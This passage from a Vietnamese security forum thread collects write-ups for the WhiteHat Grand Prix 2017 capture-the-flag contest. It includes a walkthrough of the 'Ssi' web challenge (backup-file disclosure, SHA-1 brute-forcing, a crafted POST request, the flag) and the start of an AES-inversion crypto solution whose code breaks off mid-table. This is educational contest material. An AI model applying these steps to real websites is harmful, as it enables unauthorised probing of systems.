Tổng hợp Write-up cuộc thi WhiteHat Grand Prix 2017 - Vietnam Heritages

Thảo luận trong 'Writeup WhiteHat Grand Prix' bắt đầu bởi sunny, 20/12/17, 04:12 PM.

 1. sunny

  sunny VIP Members

  Tham gia: 30/06/14, 10:06 PM
  Bài viết: 1,834
  Đã được thích: 862
  Điểm thành tích:
  113
  25437357_1512234518859936_39860678_n.jpg

  Chào các bạn, vậy là WhiteHat Grand Prix 2017 - Vietnam Heritages đã kết thúc với số lượng thử thách nhiều nhất trong các cuộc thi WhiteHat: 42 chall.


  Ban tổ chức tạo topic này để các đội chơi và các bạn thành viên chia sẻ các writeup của đội mình sau cuộc thi, qua đó giúp cộng đồng có thêm các kiến thức bổ ích.


  WhiteHat Grand Prix 2017 - Vietnam Heritages gồm 42 chall:

  Pwnable (9 bài)

  1. Objdump
  2. Shellcode_revenge++
  3. Final_countdown
  4. Joke
  5. Free
  6. Three_page
  7. Memo_manager
  8. Hellozip
  9. Passgen
  Reverse (9 bài)
  1. Bfgap
  2. Erodommoc
  3. iOS
  4. Pyc
  5. FeelMyPain
  6. Ahihi
  7. Unlock_me
  8. DebugMe
  9. WH2017_PUP
  Crypto (4 bài)
  1. Secure_token
  2. Dictionary_attack
  3. Vn_x9.31
  4. Perfect_cryptosystem

  Misc (5 bài)
  1. Color_Blend
  2. Riddle_of_signal_lamp
  3. Opsort
  4. Bot
  5. Welcome

  Forensic (6 bài)
  1. Pcap
  2. Dumpm3
  3. Keybox
  4. Congchieng
  5. Dark_Templar
  6. Her_payload

  Web (7 bài)
  1. Softweapon
  2. Social
  3. Vietnameseparty
  4. Otp
  5. 10k
  6. Ssi
  7. Mario
  Câu đặc biệt (1 bài) - Giải xong bài này sẽ được cộng thêm 10% số điểm ở thời điểm hiện tại
  1. Bamboo


  Xin cảm ơn và hẹn gặp các bạn tại cuộc thi tiếp theo của năm 2018!
  _______________

  Bài viết liên quan:

   
  Chỉnh sửa cuối: 17/01/18, 09:01 AM
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  Sugi_b3o thích bài này.
 2. whf

  whf Super Moderator Thành viên BQT

  Tham gia: 06/07/13, 03:07 AM
  Bài viết: 1,183
  Đã được thích: 764
  Điểm thành tích:
  113
  upload_2017-12-23_10-6-32.png
  Giao diện ban đầu
  upload_2017-12-23_10-5-45.png
  Xài thử coi sao — đổi màu theo ý
  upload_2017-12-23_10-7-12.png
  Kiểm tra với Burpsuite​
  Xem source không thấy gì lạ, kiểm tra file backup (index.php~) thì lấy được đoạn sau:

  upload_2017-12-23_10-8-16.png
  Nghĩa là tham số truyền vào sẽ có thêm secret thay vì chỉ có textColor như ban đầu mình kiểm tra bằng Burpsuite. Nhưng chúng ta cần quan tâm là dòng 16, để nhảy vào case này thì phải làm sao cho chuỗi SHA-1 của “secret” và “textColor” (nối với nhau) lại có 3 ký tự cuối cùng là “ab1”.

  upload_2017-12-23_10-10-10.png
  Code Java dài ngoằn, các bạn nên dùng Python cho nhanh nhé.

  simpleSHA1.java

  Mã:
  import java.io.UnsupportedEncodingException;
  import java.security.MessageDigest;
  import java.security.NoSuchAlgorithmException;
  
  public class simpleSHA1 {
  
    private static String convertToHex(byte[] data) {
      StringBuffer buf = new StringBuffer();
      for (int i = 0; i < data.length; i++) {
        int halfbyte = (data[i] >>> 4) & 0x0F;
        int two_halfs = 0;
        do {
          if ((0 <= halfbyte) && (halfbyte <= 9)) {
            buf.append((char) ('0' + halfbyte));
          } else {
            buf.append((char) ('a' + (halfbyte - 10)));
          }
          halfbyte = data[i] & 0x0F;
        } while (two_halfs++ < 1);
      }
      return buf.toString();
    }
  
    public static String SHA1(String text)
        throws NoSuchAlgorithmException, UnsupportedEncodingException {
      MessageDigest md;
      md = MessageDigest.getInstance("SHA-1");
      byte[] sha1hash = new byte[40];
      md.update(text.getBytes("iso-8859-1"), 0, text.length());
      sha1hash = md.digest();
      return convertToHex(sha1hash);
    }
  }
  stringProcessing.java

  Mã:
  public class stringProcessing {
  
    public static String getLast(String input) {
      if (input == null || input.length() < 3) {
        return input;
      } else {
        return input.substring(input.length() - 3);
      }
    }
  }
  whgp2017SSI.java

  Mã:
  import java.io.IOException;
  import java.security.NoSuchAlgorithmException;
  
  public class whgp2017SSI {
  
    public static void main(String[] args) throws IOException, NoSuchAlgorithmException {
  
      for (int i = 0; i < 10000; i++) {
        String rsHash = simpleSHA1.SHA1(String.valueOf(i)).toString();
        if (stringProcessing.getLast(rsHash).toString().equalsIgnoreCase("ab1")) {
          System.out.println("FOUND: " + i);
        }
      }
    }
  }
  Vậy là ra được mấy số, lấy cái đầu tiên xài thì sẽ ra URL như sau:

  Chỗ này các bạn có thể sửa trực tiếp trong request như sau:

  Mã:
  POST /index.php HTTP/1.1
  Host: ssi.grandprix.whitehatvn.com
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://ssi.grandprix.whitehatvn.com/index.php?secret=23&textColor=78&submit=Change
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 22
  Cookie: PHPSESSID=ovbq9nm15sasgbn05gtdkn5b40; WH-grandprix=SSBsb3ZlIHdoaXRlaGF0
  Connection: close
  Upgrade-Insecure-Requests: 1
  secret=23&textColor=78
  Cũng không hiểu vì sao Firefox thì chuyển hướng được còn Chrome thì nằm im luôn. Các bạn được đưa sang showip.php, và sau khi chuyển hướng thì cookie nó ghi lại rồi nên mình không thể quay lại index.php nữa.

  upload_2017-12-23_10-15-2.png
  showip.php — để mình tự xem IP của mình​
  Chuyển đến result.shtml để hiện kết quả
  upload_2017-12-23_10-16-3.png
  Chuyển đến result.shtml để hiện IP kèm tên do mình tự tay nhập.
  Mã nguồn của showip.php
  HTML:
  <script>console.log( 'Debug Objects: Flag at directory: value_special/flag.txt' );</script><script>console.log( 'Debug Objects: value_special = md5(filesize(index.php)-namechannelIRC)' );</script><script>console.log( 'Debug Objects: - is a character' );</script><!DOCTYPE html>
  <html>
  <head>
    <title>WH-Grandprix2017</title>
    <style type="text/css">
      body{
        background-color: #f0f0f0;
      }
      .main{
        padding-left: 500px;
        padding-top: 50px;
      }
    </style>
  </head>
  <body>
  <div class="main">
    <p>What is your IP address? Lookup your IP address</p>
    <form method ="POST" action="showip.php">
     Your name:
     <input type="text" name="name">
     <input class="submit" type="submit" value="Lookup">
    </form>
  </div>
  </body>
  </html>
  Dòng trên cùng đề có cho console log, viết tường minh ra thì nó như sau:

  Mã:
  Debug Objects: Flag at directory: value_special/flag.txt’ );
  </script>
  <script>
   console.log( ‘Debug Objects: value_special = md5(filesize(index.php)-namechannelIRC)’ );
  </script>
  <script>
   console.log( ‘Debug Objects: — is a character’ );
  Nghĩa là chúng ta sẽ phải tìm cái “value_special”, mà đề cho thêm thông tin về “value_special” là:

  value_special = md5(filesize(index.php)-namechannelIRC)
  “-” is a character

  =>> IRC channel: #whitehatgrandprix2017 và dấu “-” không phải là dấu trừ

  Còn lại là chuyển công thức trên kia:

  MD5 hash:

  1.6K-#whitehatgrandprix2017 => 36789f5cc2688fb98476eea77c6696fe

  Link flag: http://ssi.grandprix.whitehatvn.com/36789f5cc2688fb98476eea77c6696fe/flag.txt

  Băm chuỗi trên ra và bỏ vào cho đúng flag format:

  Flag: WhiteHat{dffb112c136d8317033a2152b8d32a3125cd4e4c}
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 3. whf

  whf Super Moderator Thành viên BQT

  Tham gia: 06/07/13, 03:07 AM
  Bài viết: 1,183
  Đã được thích: 764
  Điểm thành tích:
  113
  We need to implement the inverse of the permute function to get the required values which we need to send to the server to get the flag.

  permute performs 10 rounds of AES encryption using the hardcoded table which performs SubBytes, ShiftRows and MixColumns in one step.

  The solve_xor_parallel function takes the 4 values output by one round of AES and inverts this to find the 4 original values, and it does this 9 times to get the original input passed to permute

  ciphers.py

  Mã:
  #!/usr/bin/python
  # -*- coding: utf-8 -*-
  
  import struct
  import os
  import hashlib
  import binascii
  
  tbl = [
    [0xd, 0x12, 0x19, 0x15, 0x9c, 0x5, 0x1, 0xab, 0x5e, 0x6f, 0x9, 0x45,
     0x90, 0xb9, 0xc5, 0x18, 0xa4, 0xec, 0xa7, 0x13, 0x94, 0x37, 0x29, 0x9e,
     0xc3, 0xba, 0xcc, 0xc1, 0xf2, 0xca, 0x1c, 0xae, 0xd9, 0x93, 0xfd, 0x48,
     0x58, 0x51, 0x99, 0xa2, 0x5a, 0xcb, 0x8b, 0x9f, 0x1f, 0xb6, 0x5f, 0x7b,
     0x6a, 0xa9, 0x4d, 0xad, 0x76, 0xf8, 0x6b, 0xf4, 0x69, 0x7c, 0xee, 0x8c,
     0x85, 0x49, 0xdc, 0x1b, 0x67, 0xed, 0x42, 0x74, 0x75, 0x0, 0x34, 0xce,
     0x3c, 0x55, 0xb8, 0xdd, 0x47, 0x8d, 0x41, 0xea, 0x3d, 0xbf, 0x6e, 0x83,
     0x4e, 0x92, 0xdf, 0x35, 0x4, 0xa5, 0xd0, 0x57, 0x24, 0x22, 0x36, 0xa1,
     0xbe, 0x81, 0xc4, 0x95, 0x2d, 0x23, 0x5d, 0xeb, 0x2b, 0x97, 0x6c, 0x11,
     0x3e, 0x52, 0xf1, 0xc6, 0x3f, 0xcd, 0x2e, 0xe1, 0xfc, 0xf3, 0x56, 0x9b,
     0xd2, 0xd8, 0xb4, 0x4f, 0x7e, 0x91, 0x9d, 0xbc, 0xa3, 0x62, 0x7d, 0x82,
     0x31, 0xf9, 0x2a, 0x79, 0xaa, 0xc9, 0x10, 0x53, 0xa, 0x33, 0x77, 0x1d,
     0xe, 0xef, 0x21, 0xb2, 0x4c, 0x44, 0xfe, 0xe6, 0x28, 0x80, 0xd6, 0x7a,
     0xb0, 0x30, 0x65, 0xb5, 0x8e, 0x5c, 0x54, 0x64, 0x27, 0x68, 0x4a, 0x32,
     0xac, 0xbd, 0xc2, 0xc, 0xff, 0xfb, 0x8a, 0x17, 0x89, 0xa6, 0x59, 0x3,
     0xe3, 0xbb, 0x20, 0xc7, 0x2, 0x38, 0x9a, 0x84, 0xb, 0x14, 0xc0, 0x66,
     0xd4, 0x16, 0x4b, 0x40, 0x72, 0xc8, 0xda, 0xa8, 0x86, 0xb3, 0x1a, 0x71,
     0x25, 0xd3, 0xe5, 0xe4, 0x1e, 0x50, 0xdb, 0x8, 0x26, 0x6d, 0x98, 0x60,
     0xf, 0x5b, 0x39, 0xd7, 0xe8, 0xaf, 0x73, 0xf0, 0x8f, 0x96, 0xf6, 0x7f,
     0x7, 0xb7, 0xe0, 0xfa, 0xf5, 0x70, 0xe9, 0x87, 0xa0, 0x3b, 0x46, 0xb1,
     0xe2, 0xcf, 0xe7, 0x63, 0xd1, 0x88, 0x2c, 0x6, 0x2f, 0xf7, 0x43, 0x61,
     0xde, 0x3a, 0xd5, 0x78],
    [0xcb0a16b7, 0xea150989, 0xf71e029f, 0xe3120e87, 0x639b878e, 0xd3021ea7,
     0xdf061aaf, 0x3aacb0e0, 0x3e594511, 0x6d687473, 0xc70e12bf, 0x13425e27,
     0x77978b96, 0xcbea2c4, 0x88c2de3c, 0xf41f039d, 0x2ba3bffe, 0xf3ebf76e,
     0x2ea0bcf8, 0xe914088b, 0x7b938f9e, 0x85302cc3, 0xa72e32ff, 0x6599858a,
     0x82c4d830, 0x9bda1c2, 0x93cbd72e, 0x84c6da34, 0xd1f5e952, 0x99cdd122,
     0xf81b0795, 0x35a9b5ea, 0xacdec204, 0x72948890, 0xc0fae64c, 0x44f533d,
     0x345f431d, 0x2f564a0f, 0x6c9e8284, 0x21a5b9f2, 0x325d4119, 0x9accd020,
     0x5a8c90a0, 0x66988488, 0xfd180493, 0x1db1adda, 0x3d584413, 0x517c605b,
     0x626d7179, 0x3caeb2e4, 0xb4a5637, 0x30aab6ec, 0x46716d41, 0xcfffe346,
     0x616c707b, 0xdbf3ef5e, 0x676e727f, 0x587b6755, 0xf5e9f56a, 0x538b97ae,
     0x48829ebc, 0x74e523f, 0xa3dbc70e, 0xf11c009b, 0x75607c63, 0xf0eaf66c,
     0x1a455929, 0x40736f45, 0x43726e47, 0xdc071bad, 0x80332fc5, 0x95c9d52a,
     0x983b27d5, 0x23524e07, 0xfbfa3c6, 0xa0dac60c, 0x15405c23, 0x508a96ac,
     0x1f465a2f, 0xf9edf162, 0x9b3a26d7, 0x6b8a4c8, 0x6e697571, 0x428498b0,
     0xe495531, 0x71958992, 0xa6d8c408, 0x83322ec7, 0xd0031fa5, 0x28a2befc,
     0xb7d7cb16, 0x25504c03, 0xb0233fe5, 0xba2539e9, 0x86312dc1, 0x24a6baf4,
     0x5b9a5ca, 0x44869ab4, 0x8bc3df3e, 0x78928e9c, 0xab2a36f7, 0xb92438eb,
     0x3b5a4617, 0xfaecf060, 0xa12c30fb, 0x7e908c98, 0x686b7775, 0xef160a8f,
     0x9e3925d1, 0x2a554909, 0xd4f6ea54, 0x8dc1dd3a, 0x9d3824d3, 0x90cad62c,
     0xae2935f1, 0xe4e6fa74, 0xc3fbe74e, 0xd2f4e850, 0x26514d01, 0x6a9c8080,
     0xb1d5c912, 0xafdfc306, 0x1bb3afde, 0xd485433, 0x5e796551, 0x74968a94,
     0x609a868c, 0x3bba7ce, 0x22a4b8f0, 0x7a657969, 0x5b7a6657, 0x418599b2,
     0x8f362acf, 0xccfee244, 0xa22d31f9, 0x577e625f, 0x39adb1e2, 0x9cced224,
     0xec170b8d, 0x2954480b, 0xc20d11b9, 0x893428cb, 0x45706c43, 0xfb1a0697,
     0xce0915b1, 0xf6e8f468, 0xbf263aef, 0x11b5a9d2, 0x84b5735, 0x10435f25,
     0xc5f9e54a, 0xede1fd7a, 0xa42f33fd, 0x47879bb6, 0xbdd1cd1a, 0x527d6159,
     0x17b7abd6, 0x8c372bcd, 0x73627e67, 0x18b2aedc, 0x558995aa, 0x385b4715,
     0x20534f05, 0x70637f65, 0xb5203ce3, 0x646f737d, 0x24d5139, 0x8a3529c9,
     0x33abb7ee, 0xbaa6cc, 0x81c5d932, 0xc80b17b5, 0xc6f8e448, 0xcafce040,
     0x598d91a2, 0xe5100c83, 0x5c8e92a4, 0x2da1bdfa, 0x375e421f, 0xd90418ab,
     0xe2e4f870, 0xabca0c0, 0xbc273bed, 0x8ec0dc38, 0xda0519a9, 0x943f23dd,
     0x699d8182, 0x4b839fbe, 0xc10c10bb, 0xe0130f85, 0x87c7db36, 0x76617d61,
     0xbbd3cf1e, 0xe6110d81, 0x14c503b, 0x1c475b2d, 0x4a756949, 0x9fcfd326,
     0xa9ddc102, 0x3fafb3e6, 0x4d819dba, 0x12b4a8d0, 0xf21d0199, 0x4f766a4f,
     0xb3223ee7, 0xb2d4c810, 0xe8e2fe7c, 0xebe3ff7e, 0xfe190591, 0x2c574b0d,
     0xaadcc000, 0xc40f13bd, 0xb6213de1, 0x6b6a7677, 0x6f9f8386, 0x7c677b6d,
     0xcd0814b3, 0x315c401b, 0x973e22df, 0xbed0cc18, 0xffeff366, 0x36a8b4e8,
     0x4974684b, 0xd7f7eb56, 0x568894a8, 0x7d918d9a, 0xddf1ed5a, 0x5d786453,
     0xd5001ca3, 0x1eb0acd8, 0xe7e7fb76, 0xc9fde142, 0xd8f2ee5c, 0x4c776b4d,
     0xfceef264, 0x4e809cb8, 0x27a7bbf6, 0x913c20db, 0x16415d21, 0x14b6aad4,
     0xe1e5f972, 0x96c8d428, 0xeee0fc78, 0x7964786b, 0xb4d6ca14, 0x5f8f93a6,
     0xa82b37f5, 0xd6011da1, 0xad2834f3, 0xdef0ec58, 0x1944582b, 0x7f667a6f,
     0xa5d9c50a, 0x923d21d9, 0xb8d2ce1c, 0x547f635d],
    [0xd0ab3d4, 0x12158df5, 0x191e9be8, 0x151283fc, 0x9c9b8a7c, 0x502a3cc,
     0x106abc0, 0xabace425, 0x5e591521, 0x6f687772, 0x90ebbd8, 0x4542230c,
     0x90979268, 0xb9bec013, 0xc5c23897, 0x181f99eb, 0xa4a3fa34, 0xeceb6aec,
     0xa7a0fc31, 0x13148ff6, 0x94939a64, 0x3730c79a, 0x292efbb8, 0x9e998e7a,
     0xc3c4349d, 0xbabdc616, 0xcccb2a8c, 0xc1c6309b, 0xf2f556ce, 0xcacd2686,
     0x1c1b91e7, 0xaea9ee2a, 0xd9de00b3, 0x9394946d, 0xfdfa48df, 0x484f391b,
     0x585f192b, 0x51560b30, 0x999e8073, 0xa2a5f63e, 0x5a5d1d2d, 0xcbcc2485,
     0x8b8ca445, 0x9f988c79, 0x1f1897e2, 0xb6b1de02, 0x5f581722, 0x7b7c5f4e,
     0x6a6d7d7d, 0xa9aee023, 0x4d4a3314, 0xadaae82f, 0x76714559, 0xf8ff42d0,
     0x6b6c7f7e, 0xf4f35ac4, 0x696e7b78, 0x7c7b5147, 0xeee96eea, 0x8c8baa4c,
     0x8582b857, 0x494e3b18, 0xdcdb0abc, 0x1b1c9fee, 0x6760676a, 0xedea68ef,
     0x42452d05, 0x7473415f, 0x7572435c, 0x7a9c3, 0x3433c19f, 0xcec92e8a,
     0x3c3bd187, 0x5552033c, 0xb8bfc210, 0xddda08bf, 0x4740270a, 0x8d8aa84f,
     0x41462b00, 0xeaed66e6, 0x3d3ad384, 0xbfb8cc19, 0x6e697571, 0x8384b45d,
     0x4e493511, 0x9295966e, 0xdfd80cb9, 0x3532c39c, 0x403a1cf, 0xa5a2f837,
     0xd0d712a8, 0x5750073a, 0x2423e1af, 0x2225eda5, 0x3631c599, 0xa1a6f03b,
     0xbeb9ce1a, 0x8186b05b, 0xc4c33a94, 0x95929867, 0x2d2af3b4, 0x2324efa6,
     0x5d5a1324, 0xebec64e5, 0x2b2cffbe, 0x97909c61, 0x6c6b7177, 0x11168bf0,
     0x3e39d581, 0x52550d35, 0xf1f650cb, 0xc6c13e92, 0x3f38d782, 0xcdca288f,
     0x2e29f5b1, 0xe1e670fb, 0xfcfb4adc, 0xf3f454cd, 0x56510539, 0x9b9c8475,
     0xd2d516ae, 0xd8df02b0, 0xb4b3da04, 0x4f483712, 0x7e795541, 0x9196906b,
     0x9d9a887f, 0xbcbbca1c, 0xa3a4f43d, 0x62656d65, 0x7d7a5344, 0x8285b65e,
     0x3136cb90, 0xf9fe40d3, 0x2a2dfdbd, 0x797e5b48, 0xaaade626, 0xc9ce2083,
     0x101789f3, 0x53540f36, 0xa0dbddd, 0x3334cf96, 0x7770475a, 0x1d1a93e4,
     0xe09b5d1, 0xefe86ce9, 0x2126eba0, 0xb2b5d60e, 0x4c4b3117, 0x4443210f,
     0xfef94eda, 0xe6e17ef2, 0x282ff9bb, 0x8087b258, 0xd6d11ea2, 0x7a7d5d4d,
     0xb0b7d208, 0x3037c993, 0x6562636c, 0xb5b2d807, 0x8e89ae4a, 0x5c5b1127,
     0x5453013f, 0x6463616f, 0x2720e7aa, 0x686f797b, 0x4a4d3d1d, 0x3235cd95,
     0xacabea2c, 0xbdbac81f, 0xc2c5369e, 0xc0bb1d7, 0xfff84cd9, 0xfbfc44d5,
     0x8a8da646, 0x171087fa, 0x898ea043, 0xa6a1fe32, 0x595e1b28, 0x304afc6,
     0xe3e474fd, 0xbbbcc415, 0x2027e9a3, 0xc7c03c91, 0x205adc5, 0x383fd98b,
     0x9a9d8676, 0x8483ba54, 0xb0cbfde, 0x141381ff, 0xc0c73298, 0x66616569,
     0xd4d31aa4, 0x161185f9, 0x4b4c3f1e, 0x40472903, 0x72754d55, 0xc8cf2280,
     0xdadd06b6, 0xa8afe220, 0x8681be52, 0xb3b4d40d, 0x1a1d9ded, 0x71764b50,
     0x2522e3ac, 0xd3d414ad, 0xe5e278f7, 0xe4e37af4, 0x1e1995e1, 0x50570933,
     0xdbdc04b5, 0x80fb9db, 0x2621e5a9, 0x6d6a7374, 0x989f8270, 0x60676963,
     0xf08b7d2, 0x5b5c1f2e, 0x393edb88, 0xd7d01ca1, 0xe8ef62e0, 0xafa8ec29,
     0x73744f56, 0xf0f752c8, 0x8f88ac49, 0x96919e62, 0xf6f15ec2, 0x7f785742,
     0x700a7ca, 0xb7b0dc01, 0xe0e772f8, 0xfafd46d6, 0xf5f258c7, 0x70774953,
     0xe9ee60e3, 0x8780bc51, 0xa0a7f238, 0x3b3cdf8e, 0x46412509, 0xb1b6d00b,
     0xe2e576fe, 0xcfc82c89, 0xe7e07cf1, 0x63646f66, 0xd1d610ab, 0x888fa240,
     0x2c2bf1b7, 0x601a5c9, 0x2f28f7b2, 0xf7f05cc1, 0x43442f06, 0x61666b60,
     0xded90eba, 0x3a3ddd8d, 0xd5d218a7, 0x787f594b],
    [0xdafd012, 0x1291f10d, 0x1987ec06, 0x159ff80a, 0x9c967883, 0x5bfc81a,
     0x1b7c41e, 0xabf821b4, 0x5e092541, 0x6f6b7670, 0x9a7dc16, 0x453f085a,
     0x908e6c8f, 0xb9dc17a6, 0xc52493da, 0x1885ef07, 0xa4e630bb, 0xec76e8f3,
     0xa7e035b8, 0x1393f20c, 0x9486608b, 0x37db9e28, 0x29e7bc36, 0x9e927e81,
     0xc32899dc, 0xbada12a5, 0xcc3688d3, 0xc12c9fde, 0xf24acaed, 0xca3a82d5,
     0x1c8de303, 0xaef22eb1, 0xd91cb7c6, 0x9388698c, 0xfd54dbe2, 0x48251f57,
     0x58052f47, 0x5117344e, 0x999c7786, 0xa2ea3abd, 0x5a012945, 0xcb3881d4,
     0x8bb84194, 0x9f907d80, 0x1f8be600, 0xb6c206a9, 0x5f0b2640, 0x7b434a64,
     0x6a617975, 0xa9fc27b6, 0x4d2f1052, 0xadf42bb2, 0x76595d69, 0xf85ed4e7,
     0x6b637a74, 0xf446c0eb, 0x69677c76, 0x7c4d4363, 0xee72eef1, 0x8cb64893,
     0x85a4539a, 0x49271c56, 0xdc16b8c3, 0x1b83ea04, 0x677b6e78, 0xed74ebf2,
     0x4231015d, 0x745d5b6b, 0x755f586a, 0xb5c71f, 0x34dd9b2b, 0xce328ed1,
     0x3ccd8323, 0x551f384a, 0xb8de14a7, 0xdd14bbc2, 0x473b0e58, 0x8db44b92,
     0x4137045e, 0xea7ae2f5, 0x3dcf8022, 0xbfd01da0, 0x6e697571, 0x83a8599c,
     0x4e291551, 0x928a6a8d, 0xdf10bdc0, 0x35df982a, 0x4bdcb1b, 0xa5e433ba,
     0xd00eaccf, 0x571b3e48, 0x24fdab3b, 0x22f1a13d, 0x36d99d29, 0xa1ec3fbe,
     0xbed21ea1, 0x81ac5f9e, 0xc42690db, 0x9584638a, 0x2defb032, 0x23f3a23c,
     0x5d0f2042, 0xeb78e1f4, 0x2be3ba34, 0x97806588, 0x6c6d7373, 0x1197f40e,
     0x3ec98521, 0x5211314d, 0xf14ccfee, 0xc62296d9, 0x3fcb8620, 0xcd348bd2,
     0x2ee9b531, 0xe16cfffe, 0xfc56d8e3, 0xf348c9ec, 0x56193d49, 0x9b987184,
     0xd20aaacd, 0xd81eb4c7, 0xb4c600ab, 0x4f2b1650, 0x7e494561, 0x918c6f8e,
     0x9d947b82, 0xbcd618a3, 0xa3e839bc, 0x6271617d, 0x7d4f4062, 0x82aa5a9d,
     0x31d7942e, 0xf95cd7e6, 0x2ae1b935, 0x79474c66, 0xaafa22b5, 0xc93c87d6,
     0x1095f70f, 0x5313324c, 0xaa1d915, 0x33d3922c, 0x775b5e68, 0x1d8fe002,
     0xea9d511, 0xef70edf0, 0x21f7a43e, 0xb2ca0aad, 0x4c2d1353, 0x443d0b5b,
     0xfe52dee1, 0xe662f6f9, 0x28e5bf37, 0x80ae5c9f, 0xd602a6c9, 0x7a414965,
     0xb0ce0caf, 0x30d5972f, 0x657f687a, 0xb5c403aa, 0x8eb24e91, 0x5c0d2343,
     0x541d3b4b, 0x647d6b7b, 0x27fbae38, 0x68657f77, 0x4a211955, 0x32d1912d,
     0xacf628b3, 0xbdd41ba2, 0xc22a9add, 0xcadd313, 0xff50dde0, 0xfb58d1e4,
     0x8aba4295, 0x179bfe08, 0x89bc4796, 0xa6e236b9, 0x59072c46, 0x3b3c21c,
     0xe368f9fc, 0xbbd811a4, 0x20f5a73f, 0xc72095d8, 0x2b1c11d, 0x38c58f27,
     0x9a9a7285, 0x84a6509b, 0xba3da14, 0x149dfb0b, 0xc02e9cdf, 0x66796d79,
     0xd406a0cb, 0x1699fd09, 0x4b231a54, 0x4035075f, 0x7251516d, 0xc83e84d7,
     0xda1ab2c5, 0xa8fe24b7, 0x86a25699, 0xb3c809ac, 0x1a81e905, 0x7157546e,
     0x25ffa83a, 0xd308a9cc, 0xe564f3fa, 0xe466f0fb, 0x1e89e501, 0x5015374f,
     0xdb18b1c4, 0x8a5df17, 0x26f9ad39, 0x6d6f7072, 0x989e7487, 0x6075677f,
     0xfabd610, 0x5b032a44, 0x39c78c26, 0xd700a5c8, 0xe87ee4f7, 0xaff02db0,
     0x7353526c, 0xf04eccef, 0x8fb04d90, 0x96826689, 0xf642c6e9, 0x7f4b4660,
     0x7bbce18, 0xb7c005a8, 0xe06efcff, 0xfa5ad2e5, 0xf544c3ea, 0x7055576f,
     0xe97ce7f6, 0x87a05598, 0xa0ee3cbf, 0x3bc38a24, 0x46390d59, 0xb1cc0fae,
     0xe26afafd, 0xcf308dd0, 0xe760f5f8, 0x6373627c, 0xd10cafce, 0x88be4497,
     0x2cedb333, 0x6b9cd19, 0x2febb630, 0xf740c5e8, 0x4333025c, 0x6177647e,
     0xde12bec1, 0x3ac18925, 0xd504a3ca, 0x78454f67],
    [0x346e754c, 0x77334e72, 0x72343359, 0x38316f32, 0x1769b2e5, 0x605afc97,
     0x126ecfce, 0x2a5fa0fc, 0xa78c7d07, 0xc7d68190, 0xd5b84e5e, 0xffe7eea2,
     0x9d9ae92b, 0x5a4c68bb, 0x8ff426e5, 0x7013c847, 0x3dcb94cb, 0x6787fc70,
     0xe873da95, 0x986012d2, 0x888d4412, 0xef0ab862, 0x77962f7, 0x9f197025,
     0xb7569063, 0x585c2801, 0x5f254af6, 0xc03c3ad3, 0xd1ec7ba3, 0x89b053a2,
     0xd6951954, 0x16a92387, 0xc6aba805, 0x4f1bfba7, 0x998ee2f3, 0x8f27c174,
     0x54d86466, 0x1bc39fc1, 0x824d7d32, 0xd6abc46, 0x6061085b, 0x7ba2979a,
     0xf9efeaa8, 0xf48556ee],
    [0xa8cc1612, 0x96ed090d, 0x80f00206, 0x98e40e0a, 0x91648783, 0xb8d41e1a,
     0xb0d81a1e, 0xff3db0b4, 0xe394541, 0x6c6a7470, 0xa0c01216, 0x38145e5a,
     0x89708b8f, 0xdb0ba2a6, 0x238fdeda, 0x82f30307, 0xe12cbfbb, 0x71f4f7f3,
     0xe729bcb8, 0x94ee080c, 0x817c8f8b, 0xdc822c28, 0xe0a03236, 0x95628581,
     0x2f85d8dc, 0xdd0ea1a5, 0x3194d7d3, 0x2b83dade, 0x4dd6e9ed, 0x3d9ed1d5,
     0x8aff0703, 0xf532b5b1, 0x1babc2c6, 0x8f75888c, 0x53c7e6e2, 0x22035357,
     0x2334347, 0x10284a4e, 0x9b6b8286, 0xed26b9bd, 0x6354145, 0x3f9dd0d4,
     0xbf5d9094, 0x97618480, 0x8cfa0400, 0xc51aada9, 0xc3a4440, 0x44566064,
     0x66657175, 0xfb3bb2b6, 0x280c5652, 0xf337b6b2, 0x5e416d69, 0x59c8e3e7,
     0x64667074, 0x41dcefeb, 0x60607276, 0x4a5f6763, 0x75f2f5f1, 0xb1549793,
     0xa34f9e9a, 0x20005256, 0x11a4c7c3, 0x84f60004, 0x7c727c78, 0x73f7f6f2,
     0x361d595d, 0x5a476f6b, 0x58446e6a, 0xb2db1b1f, 0xda872f2b, 0x3592d5d1,
     0xca9f2723, 0x18244e4a, 0xd908a3a7, 0x13a7c6c2, 0x3c125c58, 0xb3579692,
     0x30185a5e, 0x7dfef1f5, 0xc89c2622, 0xd701a4a0, 0x6e697571, 0xaf45989c,
     0x2e095551, 0x8d76898d, 0x17a1c4c0, 0xd8842e2a, 0xbad71f1b, 0xe32fbeba,
     0x9b0cbcf, 0x1c224c48, 0xfab73f3b, 0xf6bd393d, 0xde812d29, 0xeb23babe,
     0xd502a5a1, 0xab439a9e, 0x218cdfdb, 0x837f8e8a, 0xe8ac3632, 0xf4be383c,
     0x83c4642, 0x7ffdf0f4, 0xe4a63034, 0x87798c88, 0x6a6f7773, 0x90e80a0e,
     0xce992521, 0x162d494d, 0x4bd3eaee, 0x258addd9, 0xcc9a2420, 0x3397d6d2,
     0xeea93531, 0x6be3fafe, 0x51c4e7e3, 0x4fd5e8ec, 0x1e214d49, 0x9f6d8084,
     0xdb6c9cd, 0x19a8c3c7, 0xc11cafab, 0x2c0a5450, 0x4e596561, 0x8b738a8e,
     0x93678682, 0xd104a7a3, 0xef25b8bc, 0x767d797d, 0x485c6662, 0xad46999d,
     0xd0882a2e, 0x5bcbe2e6, 0xe6a53135, 0x40506266, 0xfd3eb1b5, 0x3b9bd2d6,
     0x92eb0b0f, 0x142e484c, 0xa6c51115, 0xd48e282c, 0x5c426c68, 0x88fc0602,
     0xaec91511, 0x77f1f4f0, 0xf0b83a3e, 0xcd16a9ad, 0x2a0f5753, 0x3a175f5b,
     0x55c2e5e1, 0x65eafdf9, 0xe2a33337, 0xa9409b9f, 0x5bacdc9, 0x46556165,
